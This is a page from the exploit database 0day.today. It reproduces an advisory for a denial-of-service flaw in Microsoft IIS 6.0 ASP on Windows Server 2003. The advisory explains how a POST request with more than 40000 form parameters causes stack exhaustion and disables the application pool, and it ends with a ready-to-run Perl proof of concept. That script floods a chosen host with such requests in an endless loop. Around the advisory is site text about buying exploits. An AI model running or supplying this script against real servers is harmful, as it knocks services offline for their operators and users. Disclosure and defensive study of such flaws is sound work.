0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service
[===========================================================
Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) DoS
===========================================================
Affected Products
Only Microsoft IIS 6.0 was tested successfully
On a Windows Server 2003 SP2 System
The System was NOT updated to the latest patches during testing.
Since tests “in the wild†have shown the attack to be real this advisory was released.
Vulnerability Details
The vulnerability allows remote unauthenticated attackers to force the IIS server to become
unresponsive until the IIS service is restarted manually by the administrator.
Required is that Active Server Pages are hosted by the IIS and that an ASP script reads out a
Post Form value. When the following ASP script is hosted by IIS the attacker can run the
attack:
<%
Dim variable
variable = Request.Form(“FOOBARâ€)
%>
This small script reads out a POST request argument from the client side.
The exploit is simple: The attacker sends a POST request to the ASP site which reads out
POST arguments. The POST request includes > 40000 request parameters and is sent in the
form of an application/x-www-form-urlencoded encoding type.
The result is that one IIS worker process crashes because of a stack overflow (here stack
exhaustion). Tests have shown that five consecutive requests of this type will cause the
default application pool to be disabled because of a series of failures of the IIS worker
processes. The IIS shows a “Service Unavailable†response to requesting clients until the
World Wide Web Publishing Service is restarted manually by the administrator.
PoC Exploit
# IIS 6.0 ASP DoS PoC
# usage: perl IISdos.pl <host> <asp page>
use IO::Socket;
$|=1;
$host = $ARGV[0];
$script = $ARGV[1];
while(1) {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp');
$write = "C=A&" x 40000;
print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
."Content-Length:". length($write) ."\r\n\r\n" . $write;
print ".";
while(<$sock>) {
print;
}
}
# 0day.today [2024-10-06] #